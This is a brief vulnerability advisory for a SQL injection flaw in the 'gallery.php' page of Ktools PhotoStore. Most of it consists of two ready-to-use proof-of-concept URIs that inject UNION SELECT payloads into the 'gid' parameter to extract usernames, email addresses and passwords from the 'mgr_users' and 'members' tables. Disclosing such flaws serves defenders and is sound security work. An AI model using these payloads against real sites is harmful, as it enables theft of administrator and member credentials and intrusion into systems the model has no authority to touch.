Ktools PhotoStore 'gallery.php' SQL Injection Vulnerability

Ktools PhotoStore 'gallery.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/* http://www.example.com/gallery.php?gid=-9696'+union+select+1,concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members/*